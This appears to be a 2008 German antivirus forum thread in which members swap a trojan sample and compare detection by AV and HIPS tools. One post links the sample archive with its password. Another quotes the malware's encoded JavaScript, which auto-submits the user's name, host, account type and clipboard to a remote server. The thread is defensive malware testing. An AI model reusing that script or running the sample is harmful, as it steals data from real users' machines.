Rokop Security

Willkommen, Gast ( Anmelden | Registrierung )

231 Seiten V  « < 100 101 102 103 104 > »   
Reply to this topicStart new topic
> Uploadergebnisse v-total + jotti, viel spass :)
Gast_kurz-pc_*
Beitrag 17.06.2008, 08:04
Beitrag #2021






Gäste






ZITAT(Kenshiro @ 17.06.2008, 08:29) *
Es gibt noch Virscan. Er hat die Core Engine von a²
Hier wurde schon darüber gesprochen


Kenne ich allerdings ist der oft sehr Langsam.
Go to the top of the page
 
+Quote Post
citro
Beitrag 17.06.2008, 18:48
Beitrag #2022



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 2.829
Mitglied seit: 06.10.2005
Mitglieds-Nr.: 3.709

Betriebssystem:
Win 10 Home (1909)
Virenscanner:
Avira free
Firewall:
Comodo



ZITAT(kurz-pc @ 16.06.2008, 22:39) *
TrendMicro ist jetzt wider bei VirusTotal Vertreten.
http://blog.hispasec.com/virustotal/31

Hoffentlich kommt bald auch a-squared dazu.



habe mal im emsisoft-forum einen Link gefunden, schon ziemlich alt, sieht nicht so aus als würde es mit VT funktionieren

Klick
Go to the top of the page
 
+Quote Post
Rios
Beitrag 21.06.2008, 08:44
Beitrag #2023



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.246
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984

Betriebssystem:
Windows 10



Hier einer aus der Oase der bösen ph34r.gif

Go to the top of the page
 
+Quote Post
Julian
Beitrag 22.06.2008, 14:34
Beitrag #2024



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.794
Mitglied seit: 28.06.2007
Mitglieds-Nr.: 6.287

Betriebssystem:
Windows 7 x64
Virenscanner:
Sandboxie
Firewall:
NAT|Comodo (HIPS)



Mal wieder ein Trojaner gefällig wink.gif ?
Habe z.Z. Vista 64 mit AntiVir Premium und Comodo am laufen. AntiVir hat wirklich nichts gefunden, Comodo hat aber gemeckert, dass das Sample an verschiedenen stellen eine "smss.exe" droppen und diese dann starten wollte.
[attachment=3747:vir.jpg]

Da sieht man wieder, wie beschränkt und damit letzten Endes wirkungslos herkömmliche AV-Lösungen sein können.
Ich kann das Teil leider nicht mit dem HIPS von KIS prüfen, da Kaspersky bereits eine Signatur in petto hat und das Programm so unabhängig von der Dateianalyse einen Risikoindex von 100 bekommt.
Bietet sich wer an, das Teil mit AntiBot oder anderen Verhaltensblockern zu testen?


--------------------
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 22.06.2008, 14:58
Beitrag #2025



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



Ja gibma her...


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
Julian
Beitrag 22.06.2008, 15:16
Beitrag #2026



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.794
Mitglied seit: 28.06.2007
Mitglieds-Nr.: 6.287

Betriebssystem:
Windows 7 x64
Virenscanner:
Sandboxie
Firewall:
NAT|Comodo (HIPS)



hxxp://rapidshare.de/files/39794107/WUPH.7z.html

Das Passwort ist, wie üblich, "infected".


--------------------
Go to the top of the page
 
+Quote Post
Julian
Beitrag 22.06.2008, 15:34
Beitrag #2027



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.794
Mitglied seit: 28.06.2007
Mitglieds-Nr.: 6.287

Betriebssystem:
Windows 7 x64
Virenscanner:
Sandboxie
Firewall:
NAT|Comodo (HIPS)



Betahotfix scheint das Laden von neuen Signaturen vom Hauptserver zu verhindern, naja. Wenigstens kann ich so das Sample mit dem HIPS testen:
Hier eine kleine Bildserie:
[attachment=3748:hips1.jpg] [attachment=3749:hips2.jpg]
[attachment=3750:hips3.jpg] [attachment=3751:hips4.jpg]
[attachment=3752:task.jpg]
Der Prozess läuft nach dem Blocken diverser Aktivitäten nur noch im Leerlauf mit.

Schon böseres Zeug gesehen...


--------------------
Go to the top of the page
 
+Quote Post
Rios
Beitrag 22.06.2008, 15:43
Beitrag #2028



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 4.246
Mitglied seit: 12.06.2004
Mitglieds-Nr.: 984

Betriebssystem:
Windows 10



Angehängte Datei  Magical_Snap___2008.06.22_16.33___001.png ( 2.24KB ) Anzahl der Downloads: 27
Ist übrigens sehr jung. So etwas nennt man Reaktionszeit. biggrin.gif
Go to the top of the page
 
+Quote Post
Gast_rock_*
Beitrag 22.06.2008, 15:51
Beitrag #2029


Threadersteller




Gäste






n'abend... smile.gif

@ evil

mc afee heuristik meint es ist/kann ein keylogger.... sein...

heuristic detection |beav-vb keylogger |Trojan

die ergebnisse bei den onlinescanner sind schwach...nur kaspersky und fortinet.... von daher....seltsam...


ph34r.gif
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 22.06.2008, 15:53
Beitrag #2030



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



wird erkannt , das Teil hat einfach zuviele bösartige Aktionen auf Lager die gegen eine ganze Reihe der Antibot Regeln verstösst.

Angehängte Datei(en)
Angehängte Datei  Zwischenablage.jpg ( 134.27KB ) Anzahl der Downloads: 26
 


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
Julian
Beitrag 22.06.2008, 16:00
Beitrag #2031



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.794
Mitglied seit: 28.06.2007
Mitglieds-Nr.: 6.287

Betriebssystem:
Windows 7 x64
Virenscanner:
Sandboxie
Firewall:
NAT|Comodo (HIPS)



ZITAT(rock @ 22.06.2008, 16:50) *
n'abend... smile.gif

@ evil

mc afee heuristik meint es ist/kann ein keylogger.... sein...

heuristic detection |beav-vb keylogger |Trojan

die ergebnisse bei den onlinescanner sind schwach...nur kaspersky und fortinet.... von daher....seltsam...


ph34r.gif

Da liegt die Heuristik von McAfee anscheinend richtig. Dass so wenige Scanner das Sample signaturbasierend erkennen liegt wohl daran, dass es noch ziemlich neu ist (wie der Screen von Rios ja auch zeigt).
Das NAB was findet ist positiv, überrascht mich aber nicht smile.gif


--------------------
Go to the top of the page
 
+Quote Post
Gast_rock_*
Beitrag 22.06.2008, 16:04
Beitrag #2032


Threadersteller




Gäste






mc afee is ja nu nicht schlecht rolleyes.gif

hmm... fortinet hat überhaupt eine exotische erkennung.... hab schon oft sachen gehabt die nur von fortinet oder einem anderen erkannt wurden...hab die meistens deshalb "weggeworfen".... jetzt werd ich in so einzelfällen aufpassen! smile.gif

ph34r.gif
Go to the top of the page
 
+Quote Post
Voyager
Beitrag 22.06.2008, 16:09
Beitrag #2033



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



ZITAT
Dass so wenige Scanner das Sample signaturbasierend erkennen liegt wohl daran, dass es noch ziemlich neu ist (wie der Screen von Rios ja auch zeigt).


Ich denke das liegt eher daran weil die Scanner diese smss.exe aus dem Installer nicht extrahieren können.


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
Gast_Xeon_*
Beitrag 22.06.2008, 16:13
Beitrag #2034






Gäste






ZITAT(evil_religion @ 22.06.2008, 16:15) *
hxxp://rapidshare.de/files/39794107/WUPH.7z.html

Das Ding ist unter Vista gar nicht lauffähig. rolleyes.gif

Go to the top of the page
 
+Quote Post
Voyager
Beitrag 22.06.2008, 16:18
Beitrag #2035



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 14.840
Mitglied seit: 05.07.2004
Mitglieds-Nr.: 1.143

Betriebssystem:
Windows 7 SP1 (x64)
Virenscanner:
NIS2013
Firewall:
NIS2013



@Xeon

Da wäre ich mir an deiner Stelle nicht so sicher, genau das ist nur eine Fake Meldung ! die auch unter XP erscheint um den User zu täuschen das Programm sei nicht lauffähig und trotzdem startet sich die SMSS im Userverzeichnis Startmenüordner , hier wird Vista nur unter Umständen eine UAC Meldung bringen wenn das Rootkit eine administrative Schreibberechtigung anfordert.
Gleich mal mit Vista testen...

Da isse
C:\Users\Test\AppData\Roaming\Microsoft\Windows\Start Menu\smss.exe

Der Installer erstellt auch eine HTML Datei im Startmenü , wenn man diese aufruft soll ein ActiveX ausgeführt werden.
ZITAT
<script language=JavaScript>mik='%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cform%20method%3D%22POST%22%20action%3D%22%0D%0A%22%20name%3D%22form1%22%3E%0D%0A%20%20%3Cp%3E%0D%0A%20%20%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T1%22%20size%3D%2220%22%20%0D%0Avalue%3D%22To%22%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20name%3D%22T2%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Test%60%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20%0D%0Aname%3D%22T3%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60TEST-PC@gurushop.com%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T4%22%20%0D%0Asize%3D%2220%22%20value%3D%22Subject%22%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T5%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Test%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T6%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60TEST-PC%60%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22T7%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Batch%60%3E%3Cinput%20%0D%0Atype%3D%22hidden%22%20%0D%0Aname%3D%22T8%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Cyber%60%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T9%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60Administrator%60%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T10%22%20size%3D%2220%22%20%0D%0A%20value%3D%60Mudi%60%3E%3Cinput%20type%3D%22hidden%22%20%0D%0Aname%3D%22T21%22%20%0D%0Asize%3D%2220%22%20%0D%0A%20value%3D%60http%3A//9down.pcriot.com/guru/Insert.php%60%3E%3C/p%3E%0D%0A%20%20%3Cp%3E%3Ctextarea%20%0D%0Arows%3D%221%22%20%0D%0Aname%3D%22S1%22%20%0D%0Acols%3D%221%22%3E%0D%0APCUSER%20%3A%20Test%0D%0APCHOST%20%3A%20TEST-PC%0D%0AAcct%20Type%20%3A%20Administrator%0D%0AAdmin%20%3A%20Mudi%0D%0ASerial%20%3A%20Cyber%0D%0ABatch%20%3A%20Batch%0D%0A%0D%0A%0D%0A%0D%0ACLIPBOARD%20%3A%20%0D%0A%3C/textarea%3E%3C/p%3E%0D%0A%3C/form%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E%0D%0A';duk=unescape(mik);document.write(duk);</script><script language='javascript'>document.form1.submit()</script>


Der Beitrag wurde von bond7 bearbeitet: 22.06.2008, 16:35


--------------------
Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System:
Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB

"Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach."
Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI
Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s
Go to the top of the page
 
+Quote Post
chris30duew
Beitrag 22.06.2008, 16:25
Beitrag #2036



Wohnt schon fast hier
*****

Gruppe: Mitglieder
Beiträge: 1.462
Mitglied seit: 26.03.2007
Wohnort: Mannheim
Mitglieds-Nr.: 5.972

Betriebssystem:
W8 H 32Bit/ W7 H 32Bit
Virenscanner:
BD2014/ F-Secure2014
Firewall:
BD2014/ F-Secure2014



Da hat bond recht es erscheint auch bei XP und dennoch startet smss laut tastmanager.
Was mich irgendwie etwas erschüttert, das F-secure 2009 nicht den geringsten mucks macht, weder der AV noch die Heuristik noch und das ist eigentlich am traurigsten, weil ja dafür eigentlich da, deepguard.
Zumindest hätte ich mal so ne reaktion wie bei Antibot erwartet, oder das zumindest mal irgend ne warnung kommt über einen verbotenen prozess oder so....
Nix passiert. die smss.exe läuft vor sich hin, f-secure, deepguard macht keinen mucks


wird hiermit wieder deinstalliert, denn für was brauch ich eine proaktive erkennung wie deepguard die nicht anspricht
Go to the top of the page
 
+Quote Post
Gast_Nightwatch_*
Beitrag 22.06.2008, 16:43
Beitrag #2037






Gäste






ZITAT(chris30duew @ 22.06.2008, 17:24) *
Zumindest hätte ich mal so ne reaktion wie bei Antibot erwartet, oder das zumindest mal irgend ne warnung kommt über einen verbotenen prozess oder so....
Nix passiert. die smss.exe läuft vor sich hin, f-secure, deepguard macht keinen mucks


Hey Chris!

Bin gerade nicht zuhause und werde das Sample erst nachher testen können. Wie war/ist Deepguard bei Dir konfiguriert? Auf welchem OS hast Du die Datei ausgeführt?
Go to the top of the page
 
+Quote Post
chris30duew
Beitrag 22.06.2008, 16:47
Beitrag #2038



Wohnt schon fast hier
*****

Gruppe: Mitglieder
Beiträge: 1.462
Mitglied seit: 26.03.2007
Wohnort: Mannheim
Mitglieds-Nr.: 5.972

Betriebssystem:
W8 H 32Bit/ W7 H 32Bit
Virenscanner:
BD2014/ F-Secure2014
Firewall:
BD2014/ F-Secure2014



hey nightwatch

deepguard war so wie intalliert. also der haken für die leistungsverbesserung und nachfragen oder so. also erster und dritter haken war drin eben so wie installiert.
ich wüsste auch nicht das ich auch noch an den deepguard hand anlegen muss um geschützt zu sein, grad das soll ja nicht der fall sein, da er ja vor unbekanntem schützen soll.
ich habs auf winxp sp3 getestet

kannst ja auch mal versuchen wenn du at home bist

gruss chris
Go to the top of the page
 
+Quote Post
Gast_Nightwatch_*
Beitrag 22.06.2008, 17:00
Beitrag #2039






Gäste






ZITAT(chris30duew @ 22.06.2008, 17:46) *
ich wüsste auch nicht das ich auch noch an den deepguard hand anlegen muss um geschützt zu sein, grad das soll ja nicht der fall sein, da er ja vor unbekanntem schützen soll.
ich habs auf winxp sp3 getestet


Ok, danke Dir!

Hatte nur gefragt, damit ich das unter gleichen Umständen testen kann. Leider besitze ich aber nur noch Vista-Oberflächen.

Trotzdem noch schnell zwei Fragen:

1.) Gehe ich richtig in der Annahme, dass Du das Technology-Preview auf dem Rechner hast? (ISTP)
2.) Leistungsoptimiert...meinst Du damit a) die Einstellungsmöglichkeit unter der Systemsteuerung Verbindungen zum Server herzustellen (siehe Bild) :


oder b) die Einstellung des gesamten AntiVirus/Antispy-Schutzes ? (folgendes Bild) :




Grüße
Nightwatch

Der Beitrag wurde von Nightwatch bearbeitet: 22.06.2008, 17:01
Go to the top of the page
 
+Quote Post
Gast_Xeon_*
Beitrag 22.06.2008, 17:08
Beitrag #2040






Gäste






ZITAT(bond7 @ 22.06.2008, 17:17) *
@Xeon

Da wäre ich mir an deiner Stelle nicht so sicher, genau das ist nur eine Fake Meldung ! die auch unter XP erscheint um den User zu täuschen das Programm sei nicht lauffähig und trotzdem startet sich die SMSS im Userverzeichnis Startmenüordner....

Hast recht,jetzt hab ich es auch gesehen..... whistling.gif


Go to the top of the page
 
+Quote Post

231 Seiten V  « < 100 101 102 103 104 > » 
Reply to this topicStart new topic
297 Besucher lesen dieses Thema (Gäste: 297 | Anonyme Besucher: 0)
0 Mitglieder:

 



Vereinfachte Darstellung Aktuelles Datum: 18.05.2025, 02:19
Impressum